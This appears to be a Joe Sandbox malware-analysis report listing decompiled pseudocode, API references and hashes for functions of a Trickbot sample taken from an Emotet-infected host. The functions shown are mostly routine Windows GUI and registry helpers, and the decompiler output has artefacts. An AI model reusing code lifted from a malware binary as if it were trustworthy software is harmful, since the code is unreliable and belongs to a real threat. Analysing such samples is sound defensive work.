                          • Instruction Fuzzy Hash: 7201F932600214ABDF106FB8DC49F9EBB78EF54740F014129FB51AB291DBB4AC01CB94
                          Uniqueness
                          • Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00428804(void* __ecx, CHAR* _a4, CHAR* _a8, char _a12) {
                          				char _v20;
                          				void* _t17;
                          				long _t19;
                          				void* _t27;
                          				void* _t28;
                          
                          				_t27 = __ecx;
                          				if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
                          					wsprintfA( &_v20, "%d", _a12);
                          					return WritePrivateProfileStringA(_a4, _a8,  &_v20,  *(_t27 + 0x90));
                          				}
                          				_t17 = E0043201B(__ecx, _a4);
                          				_t28 = _t17;
                          				if(_t28 != 0) {
                          					_t19 = RegSetValueExA(_t28, _a8, 0, 4,  &_a12, 4);
                          					RegCloseKey(_t28);
                          					return 0 | _t19 == 0x00000000;
                          				}
                          				return _t17;
                          			}

                          Instruction addresses: 0x0042880b, 0x00428811, 0x00428855, 0x00000000, 0x0042886e, 0x00428816, 0x0042881b, 0x0042881f, 0x00428830, 0x00428839, 0x00000000, 0x00428846, 0x00428876

                          APIs
                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 00428830
                          • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00428839
                          • wsprintfA.USER32 ref: 00428855
                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0042886E
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ClosePrivateProfileStringValueWritewsprintf
                          • String ID:
                          • API String ID: 1902064621-0
                          • Opcode ID: 59c2b3b50b47d1f2405115da46d4e261837adb768674886530d7b0bcea34e14e
                          • Instruction ID: 099bac61d737788e6343fa5323b843f7a9a3863b745646880d7b6d625d952176
                          • Opcode Fuzzy Hash: 59c2b3b50b47d1f2405115da46d4e261837adb768674886530d7b0bcea34e14e
                          • Instruction Fuzzy Hash: C301A232500625BBCB115F64DC05FAF37B8BF08714F44442AFA11A61A0EBB5D911CB98
                          Uniqueness
                          • Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E004302BA(void* __ecx) {
                          				void* __esi;
                          				void* _t16;
                          				void* _t28;
                          				void* _t30;
                          				intOrPtr _t32;
                          				intOrPtr _t34;
                          
                          				E00405340(E004387BC, _t30);
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t34 =  *0x44b35c; // 0x1
                          				 *((intOrPtr*)(_t30 - 0x10)) = _t32;
                          				_t28 = __ecx;
                          				if(_t34 == 0) {
                          					 *((intOrPtr*)(_t30 - 4)) = 0;
                          					if( *(_t30 + 0xc) != 0) {
                          						lstrcpyA(E0041826E(_t28 + 0xc8, lstrlenA( *(_t30 + 0xc))),  *(_t30 + 0xc));
                          					} else {
                          						E00417E53(__ecx + 0xc8, __ecx);
                          					}
                          					SendMessageA( *(_t28 + 0x1c), 0x85, 0, 0);
                          					_t16 = 1;
                          				} else {
                          					_t16 = E004187B4(__ecx);
                          				}
                          				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
                          				return _t16;
                          			}

                          Instruction addresses: 0x004302bf, 0x004302c4, 0x004302c5, 0x004302cb, 0x004302d1, 0x004302d4, 0x004302d6, 0x004302e2, 0x004302e5, 0x0043030d, 0x004302e7, 0x004302ed, 0x004302ed, 0x0043031d, 0x00430325, 0x004302d8, 0x004302d8, 0x004302d8, 0x00430335, 0x0043033e

                          APIs
                          • __EH_prolog.LIBCMT ref: 004302BF
                          • SendMessageA.USER32(?,00000085,00000000,00000000), ref: 0043031D
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prologMessageSend
                          • String ID:
                          • API String ID: 2337391251-0
                          • Opcode ID: aef2270c1aee9b4039f5e14badfada3e2e85be03f8a947770d27bea74b741efd
                          • Instruction ID: 573d88748fd1d72ca91e911712e4e30091aa6effc525c16d676407f830b30020
                          • Opcode Fuzzy Hash: aef2270c1aee9b4039f5e14badfada3e2e85be03f8a947770d27bea74b741efd
                          • Instruction Fuzzy Hash: 62018F72400604EFD7219F52DC59AEFB7A9FB88710F10822FF45252190CBB85D41CB29
                          Uniqueness
                          • Uniqueness Score: -1.00%

                          C-Code - Quality: 74%
                          			E0040F8E9(void* __ecx) {
                          				long _t1;
                          				long _t3;
                          				long _t8;
                          				void* _t9;
                          
                          				_t1 =  *0x44bee8; // 0x2
                          				_t9 = __ecx;
                          				_t8 = 2;
                          				if(_t1 != _t8) {
                          					__eflags = _t1;
                          					if(_t1 != 0) {
                          						while(1) {
                          							L7:
                          							__eflags =  *0x44bee8 - 1;
                          							if( *0x44bee8 != 1) {
                          								break;
                          							}
                          							Sleep(1);
                          						}
                          						__eflags =  *0x44bee8 - _t8; // 0x2
                          						if(__eflags != 0) {
                          							L12:
                          							return _t9;
                          						}
                          						L10:
                          						_push(0x44bed0);
                          						L11:
                          						EnterCriticalSection();
                          						goto L12;
                          					}
                          					_t3 = InterlockedExchange(0x44bee8, 1);
                          					__eflags = _t3;
                          					if(__eflags != 0) {
                          						__eflags = _t3 - _t8;
                          						if(_t3 == _t8) {
                          							 *0x44bee8 = _t8;
                          						}
                          						goto L7;
                          					}
                          					InitializeCriticalSection(0x44bed0);
                          					E00404AE0(__eflags, E0040F967);
                          					 *0x44bee8 = _t8;
                          					goto L10;
                          				}
                          				_push(0x44bed0);
                          				goto L11;
                          			}

                          Instruction addresses: 0x0040f8e9, 0x0040f8f3, 0x0040f8f5, 0x0040f8f8, 0x0040f901, 0x0040f908, 0x0040f93f, 0x0040f93f, 0x0040f93f, 0x0040f946, 0x00000000, 0x00000000, 0x0040f94a, 0x0040f94a, 0x0040f952, 0x0040f958, 0x0040f961, 0x0040f966, 0x0040f966, 0x0040f95a, 0x0040f95a, 0x0040f95b, 0x0040f95b, 0x00000000, 0x0040f95b, 0x0040f911, 0x0040f917, 0x0040f919, 0x0040f935, 0x0040f937, 0x0040f939, 0x0040f939, 0x00000000, 0x0040f937, 0x0040f91c, 0x0040f927, 0x0040f92d, 0x00000000, 0x0040f92d, 0x0040f8fa, 0x00000000

                          APIs
                          • InterlockedExchange.KERNEL32(0044BEE8,00000001), ref: 0040F911
                          • InitializeCriticalSection.KERNEL32(0044BED0,?,?,?,0040DD3D), ref: 0040F91C
                          • EnterCriticalSection.KERNEL32(0044BED0,?,?,?,0040DD3D), ref: 0040F95B
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterExchangeInitializeInterlocked
                          • String ID:
                          • API String ID: 3643093385-0
                          • Opcode ID: 8a549a783b0bb216b936606e438711466d9fe96f821479e738c9d0bfb9e3a691
                          • Instruction ID: 795af708f39f71223e7614aee95b49d8bd10359373c432963277ac9fc91390b1
                          • Opcode Fuzzy Hash: 8a549a783b0bb216b936606e438711466d9fe96f821479e738c9d0bfb9e3a691
                          • Instruction Fuzzy Hash: 90F081B6744201BAEA31DB556C89B973654E3C1B65F340037F601B15E0D7F88C86875D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041AAE3(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
                          				long _v12;
                          				void _v16;
                          				intOrPtr _t12;
                          				long _t16;
                          				void* _t18;
                          
                          				if(_a4 == 0 || _a16 == 0) {
                          					L10:
                          					return 0;
                          				} else {
                          					_t12 = _a12;
                          					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E004225BE(_a8, _t12) == 0) {
                          						goto L10;
                          					} else {
                          						GetObjectA(_a16, 0xc,  &_v16);
                          						SetBkColor(_a4, _v12);
                          						_t16 = _a20;
                          						if(_t16 == 0xffffffff) {
                          							_t16 = GetSysColor(8);
                          						}
                          						SetTextColor(_a4, _t16);
                          						_t18 = 1;
                          						return _t18;
                          					}
                          				}
                          			}

                          Instruction addresses: 0x0041aaed 0x0041ab52 0x00000000 0x0041aaf5 0x0041aaf5 0x0041aafb 0x00000000 0x0041ab18 0x0041ab21 0x0041ab2d 0x0041ab33 0x0041ab39 0x0041ab3d 0x0041ab3d 0x0041ab47 0x0041ab4f 0x00000000 0x0041ab4f 0x0041aafb

                          APIs
                          • GetObjectA.GDI32(00000000,0000000C,?), ref: 0041AB21
                          • SetBkColor.GDI32(00000000,00000000), ref: 0041AB2D
                          • GetSysColor.USER32(00000008), ref: 0041AB3D
                          • SetTextColor.GDI32(00000000,?), ref: 0041AB47
                            • Part of subcall function 004225BE: GetWindowLongA.USER32(00000000,000000F0), ref: 004225CF
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Color$LongObjectTextWindow
                          • String ID:
                          • API String ID: 2871169696-0
                          • Opcode ID: a442c9f52ad4fd832de06cc88f32a30b3b4c86f5614825be2e99379fcbf38e4a
                          • Instruction ID: 0b8f7dd1830b2ee0fd3cab244b261d724f8fe3eb4471e6e6c538c2cc244534fb
                          • Opcode Fuzzy Hash: a442c9f52ad4fd832de06cc88f32a30b3b4c86f5614825be2e99379fcbf38e4a
                          • Instruction Fuzzy Hash: 0B014F30506149ABEF215F54DC49AEB3B6AEB00350F144522FA02D51E0C778EDE4D65A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0042DCB8(void* __ecx, void* _a4) {
                          				int _v8;
                          				char _v268;
                          				void* __ebp;
                          				void* _t15;
                          				int _t19;
                          				intOrPtr* _t23;
                          				void* _t25;
                          
                          				E0041884D(_t25, SetActiveWindow( *(__ecx + 0x1c)));
                          				_t19 = 0;
                          				_v8 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
                          				_t15 = E00432562();
                          				_t23 =  *((intOrPtr*)(_t15 + 4));
                          				if(_v8 > 0) {
                          					do {
                          						DragQueryFileA(_a4, _t19,  &_v268, 0x104);
                          						_t15 =  *((intOrPtr*)( *_t23 + 0x7c))( &_v268);
                          						_t19 = _t19 + 1;
                          					} while (_t19 < _v8);
                          				}
                          				DragFinish(_a4);
                          				return _t15;
                          			}

                          Instruction addresses: 0x0042dcce 0x0042dcd9 0x0042dce4 0x0042dce7 0x0042dcef 0x0042dcf2 0x0042dcf4 0x0042dd04 0x0042dd11 0x0042dd14 0x0042dd15 0x0042dcf4 0x0042dd1d 0x0042dd27

                          APIs
                          • SetActiveWindow.USER32(?), ref: 0042DCC7
                          • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 0042DCE2
                          • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 0042DD04
                          • DragFinish.SHELL32(?), ref: 0042DD1D
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Drag$FileQuery$ActiveFinishWindow
                          • String ID:
                          • API String ID: 892977027-0
                          • Opcode ID: ae08d12314bfff497061791b30ab91291e84b923f60e2ebda0019bcbf0ab56af
                          • Instruction ID: 2c8943c3bdef9204189fe6f1fee0ecbf9399023cccd1dcb296840862c044332e
                          • Opcode Fuzzy Hash: ae08d12314bfff497061791b30ab91291e84b923f60e2ebda0019bcbf0ab56af
                          • Instruction Fuzzy Hash: F5016DB1904118BFDF01AFA5DD84DDE7BB8EF48358B10406AB555970A0CBB49E81CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00436ED0(void* __ecx) {
                          				struct tagPOINT _v12;
                          				struct tagPOINT _v20;
                          				struct HDC__* _t19;
                          
                          				_t19 =  *(__ecx + 8);
                          				if(_t19 != 0 &&  *(__ecx + 4) != 0) {
                          					GetViewportOrgEx(_t19,  &_v12);
                          					E00436FD2(__ecx,  &_v12);
                          					_v12.y = _v12.y +  *((intOrPtr*)(__ecx + 0x24));
                          					_v12.x = _v12.x +  *((intOrPtr*)(__ecx + 0x20));
                          					SetViewportOrgEx( *(__ecx + 4), _v12, _v12.y, 0);
                          					GetWindowOrgEx( *(__ecx + 8),  &_v20);
                          					return SetWindowOrgEx( *(__ecx + 4), _v20, _v20.y, 0);
                          				}
                          				return _t19;
                          			}

                          Instruction addresses: 0x00436ed9 0x00436ede 0x00436eeb 0x00436ef7 0x00436f02 0x00436f05 0x00436f13 0x00436f20 0x00000000 0x00436f31 0x00436f39

                          APIs
                          • GetViewportOrgEx.GDI32(?,?), ref: 00436EEB
                            • Part of subcall function 00436FD2: GetViewportExtEx.GDI32(?,?), ref: 00436FE3
                            • Part of subcall function 00436FD2: GetWindowExtEx.GDI32(?,?), ref: 00436FF0
                          • SetViewportOrgEx.GDI32(00000000,?,00000000,00000000), ref: 00436F13
                          • GetWindowOrgEx.GDI32(?,?), ref: 00436F20
                          • SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 00436F31
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ViewportWindow
                          • String ID:
                          • API String ID: 1589084482-0
                          • Opcode ID: a6efadef3e84db6a1dc01d819cc56c8a56c80131aefc04b7682a5ce80d1d4dc3
                          • Instruction ID: 40cbf02877ad5f5a84e969d5412a8ac077745f8ac71469ef7174bd3f7eb77b5e
                          • Opcode Fuzzy Hash: a6efadef3e84db6a1dc01d819cc56c8a56c80131aefc04b7682a5ce80d1d4dc3
                          • Instruction Fuzzy Hash: 0D01287190020AFBDF249B94DC49AEEBBB9FF08710F004469A556A21A0D771A950DB18
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041A917(void* __ecx) {
                          				void* _t11;
                          				void* _t12;
                          				void* _t16;
                          
                          				_t12 = __ecx;
                          				if((E0041B66F(__ecx) & 0x40000000) != 0) {
                          					L6:
                          					return E004187B4(_t12);
                          				}
                          				_t16 = E004041A9();
                          				if(_t16 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
                          					goto L6;
                          				} else {
                          					SendMessageA( *(_t16 + 0x1c), 0x111, 0xe146, 0);
                          					_t11 = 1;
                          					return _t11;
                          				}
                          			}

                          Instruction addresses: 0x0041a91a 0x0041a926 0x0041a96e 0x00000000 0x0041a970 0x0041a92d 0x0041a931 0x00000000 0x0041a954 0x0041a963 0x0041a96b 0x00000000 0x0041a96b

                          APIs
                            • Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B
                          • GetKeyState.USER32(00000010), ref: 0041A93B
                          • GetKeyState.USER32(00000011), ref: 0041A944
                          • GetKeyState.USER32(00000012), ref: 0041A94D
                          • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0041A963
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: State$LongMessageSendWindow
                          • String ID:
                          • API String ID: 1063413437-0
                          • Opcode ID: ae9a96d039c370fb255dc1ab9ea2c87baf4394a04333a9a787e2216501a3ad5c
                          • Instruction ID: 0a202738f2d38c9c9ff172e2079839d3ccfde75787ea1009fffee619023b8918
                          • Opcode Fuzzy Hash: ae9a96d039c370fb255dc1ab9ea2c87baf4394a04333a9a787e2216501a3ad5c
                          • Instruction Fuzzy Hash: 76F027F379134975E92036A21C42FDD01154F80BD4F06093BF741BE1D189E988E2427E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 43%
                          			E00430191(intOrPtr* __eax, struct tagRECT* _a8, intOrPtr _a12) {
                          				int _t13;
                          				int _t14;
                          				void* _t17;
                          				signed int _t19;
                          				struct tagRECT* _t23;
                          
                          				 *__eax =  *__eax + __eax;
                          				if( *__eax == 0) {
                          					_t19 = E0041B66F(_t17);
                          					if((_t19 & 0x00040600) == 0) {
                          						_push(GetSystemMetrics(6));
                          						_push(5);
                          					} else {
                          						_push(GetSystemMetrics(0x21));
                          						_push(0x20);
                          					}
                          					_t13 = GetSystemMetrics();
                          					_t23 = _a8;
                          					_t14 = InflateRect(_t23, _t13, ??);
                          					if((_t19 & 0x00c00000) != 0) {
                          						_t14 =  *0x44b72c; // 0x0
                          						_t23->top = _t23->top - _t14;
                          					}
                          				} else {
                          					_t14 = E0041A46A(_t17, _a8, _a12);
                          				}
                          				return _t14;
                          			}

                          Instruction addresses: 0x00430194 0x00430197 0x004301ae 0x004301b6 0x004301d1 0x004301d2 0x004301b8 0x004301c2 0x004301c3 0x004301c3 0x004301d4 0x004301d6 0x004301dc 0x004301e9 0x004301eb 0x004301f0 0x004301f0 0x00430199 0x004301a1 0x004301a1 0x004301f4

                          APIs
                          • GetSystemMetrics.USER32(00000021), ref: 004301C0
                          • GetSystemMetrics.USER32(00000005), ref: 004301D4
                          • InflateRect.USER32(?,00000000), ref: 004301DC
                            • Part of subcall function 0041A46A: AdjustWindowRectEx.USER32(?,00000000,00000000,00000000), ref: 0041A48B
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MetricsRectSystem$AdjustInflateWindow
                          • String ID:
                          • API String ID: 4080371637-0
                          • Opcode ID: b853817094825d14b773b59d43d83c6b2a2bf9dfd53105354ef664b19934a974
                          • Instruction ID: 31ffdf55344c6a8bbc1aa784fb65bf090684f1584ed27cb9a2cd41510527f332
                          • Opcode Fuzzy Hash: b853817094825d14b773b59d43d83c6b2a2bf9dfd53105354ef664b19934a974
                          • Instruction Fuzzy Hash: 3BF02433945310AFDB01AB649C15BBB7B68EF99720F09152BF51857190C6B59C10CBAF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E004218DE(intOrPtr __ecx) {
                          				struct HMENU__* _t13;
                          				struct HMENU__* _t14;
                          				struct HMENU__* _t15;
                          				void* _t17;
                          				intOrPtr _t29;
                          				void* _t31;
                          
                          				 *((intOrPtr*)(__ecx)) = 0x43d230;
                          				E00405340(E00438A98, _t31);
                          				_push(__ecx);
                          				_t29 = __ecx;
                          				 *((intOrPtr*)(_t31 - 0x10)) = __ecx;
                          				_t13 =  *(__ecx + 0x24);
                          				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
                          				if(_t13 != 0) {
                          					DestroyMenu(_t13);
                          				}
                          				_t14 =  *(_t29 + 0x2c);
                          				if(_t14 != 0) {
                          					DestroyMenu(_t14);
                          				}
                          				_t15 =  *(_t29 + 0x34);
                          				if(_t15 != 0) {
                          					DestroyMenu(_t15);
                          				}
                          				E00417EC8(_t29 + 0x60);
                          				 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
                          				_t17 = E0041B8D3(_t29);
                          				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0xc));
                          				return _t17;
                          			}

                          Instruction addresses: 0x004218de 0x00422c4e 0x00422c53 0x00422c55 0x00422c58 0x00422c5b 0x00422c5e 0x00422c6a 0x00422c6d 0x00422c6d 0x00422c6f 0x00422c74 0x00422c77 0x00422c77 0x00422c79 0x00422c7e 0x00422c81 0x00422c81 0x00422c86 0x00422c8b 0x00422c91 0x00422c9b 0x00422ca3

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: DestroyMenu$H_prolog
                          • String ID:
                          • API String ID: 750541241-0
                          • Opcode ID: dbe10390a64de6f94b1a0dac0a2b1591c5418cee984a07300d04e9c63eb17faa
                          • Instruction ID: b30a52868837e11894a5a009bd114a011af5a20adf3bf9e605b04cbe3bb23ea7
                          • Opcode Fuzzy Hash: dbe10390a64de6f94b1a0dac0a2b1591c5418cee984a07300d04e9c63eb17faa
                          • Instruction Fuzzy Hash: 00F04F71B00615ABC724AF6BEA45B9FB3ECAF44710B00465FE052D7690CBF8ED008B58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E0042F5E7(struct tagRECT* _a8) {
                          				signed int _t11;
                          				int _t13;
                          				intOrPtr _t14;
                          				void* _t18;
                          				signed int _t20;
                          				struct tagRECT* _t23;
                          
                          				if( *0x44b35c != 0) {
                          					return E004187B4(_t18);
                          				}
                          				_t20 = E0041B66F(_t18);
                          				if((_t20 & 0x00040600) == 0) {
                          					_push( ~(GetSystemMetrics(6)));
                          					_push(5);
                          				} else {
                          					_push( ~(GetSystemMetrics(0x21)));
                          					_push(0x20);
                          				}
                          				_t11 = GetSystemMetrics();
                          				_t23 = _a8;
                          				_t13 = InflateRect(_t23,  ~_t11, ??);
                          				if((_t20 & 0x00c00000) != 0) {
                          					_t14 =  *0x44b72c; // 0x0
                          					_t23->top = _t23->top + _t14;
                          					return _t14;
                          				}
                          				return _t13;
                          			}

                          Instruction addresses: 0x0042f5ef 0x00000000 0x0042f5f1 0x0042f5fe 0x0042f606 0x0042f625 0x0042f626 0x0042f608 0x0042f614 0x0042f615 0x0042f615 0x0042f628 0x0042f62a 0x0042f632 0x0042f63f 0x0042f641 0x0042f646 0x00000000 0x0042f646 0x0042f64a

                          APIs
                          • GetSystemMetrics.USER32(00000021), ref: 0042F610
                          • GetSystemMetrics.USER32(00000005), ref: 0042F628
                          • InflateRect.USER32(?,00000000), ref: 0042F632
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MetricsSystem$InflateRect
                          • String ID:
                          • API String ID: 437325472-0
                          • Opcode ID: e3788d4aaa6281c11638be29368c1018a154e50f5c2ca3ff72ca958bcbb1117a
                          • Instruction ID: b116379fca4d468a88f65684b8e28fcd9d5967eb9baeaf6a91e0f9293bd629ae
                          • Opcode Fuzzy Hash: e3788d4aaa6281c11638be29368c1018a154e50f5c2ca3ff72ca958bcbb1117a
                          • Instruction Fuzzy Hash: 5DF08932781634AFE610AB65BC01B7B3268EB41B14F95043BB91597190C6685C568BAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E00401EF0(void* __fp0, intOrPtr _a4) {
                          				int _v4;
                          				int _v20;
                          				int _t10;
                          				intOrPtr _t11;
                          				intOrPtr _t12;
                          				void* _t14;
                          				intOrPtr _t16;
                          				void* _t17;
                          
                          				_t16 = _a4;
                          				_t17 = _t14;
                          				_v4 = GetDeviceCaps( *(_t16 + 8), 4);
                          				_t10 = GetDeviceCaps( *(_t16 + 8), 6);
                          				asm("fild dword [esp+0x14]");
                          				_v20 = _t10;
                          				_t11 = E00405028();
                          				asm("fild dword [esp+0xc]");
                          				 *((intOrPtr*)(_t17 + 0x90)) = _t11;
                          				_t12 = E00405028();
                          				 *((intOrPtr*)(_t17 + 0x94)) = _t12;
                          				return _t12;
                          			}

                          Instruction addresses: 0x00401efa 0x00401f00 0x00401f0e 0x00401f12 0x00401f14 0x00401f18 0x00401f22 0x00401f27 0x00401f2b 0x00401f37 0x00401f3c 0x00401f46

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CapsDevice__ftol
                          • String ID:
                          • API String ID: 3477951718-0
                          • Opcode ID: 0abd36899093160f3ef8f532299ba60b92992d327fb28ff8f70107ff79fc846a
                          • Instruction ID: e214ea2f0b6aacb36c559ac4607d55e41231ba882c9bc41611a5e6f4ded21c6f
                          • Opcode Fuzzy Hash: 0abd36899093160f3ef8f532299ba60b92992d327fb28ff8f70107ff79fc846a
                          • Instruction Fuzzy Hash: 7EF0DAB6908701AFD714DF66EC46A4BF7E8FB89721F01C92EB259A3250D6709808CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004226A8(struct HWND__* _a4, CHAR* _a8) {
                          				char _v260;
                          				int _t14;
                          				int _t15;
                          
                          				_t15 = lstrlenA(_a8);
                          				if(_t15 > 0x100 || GetWindowTextA(_a4,  &_v260, 0x100) != _t15) {
                          					L3:
                          					return SetWindowTextA(_a4, _a8);
                          				}
                          				_t14 = lstrcmpA( &_v260, _a8);
                          				if(_t14 != 0) {
                          					goto L3;
                          				}
                          				return _t14;
                          			}

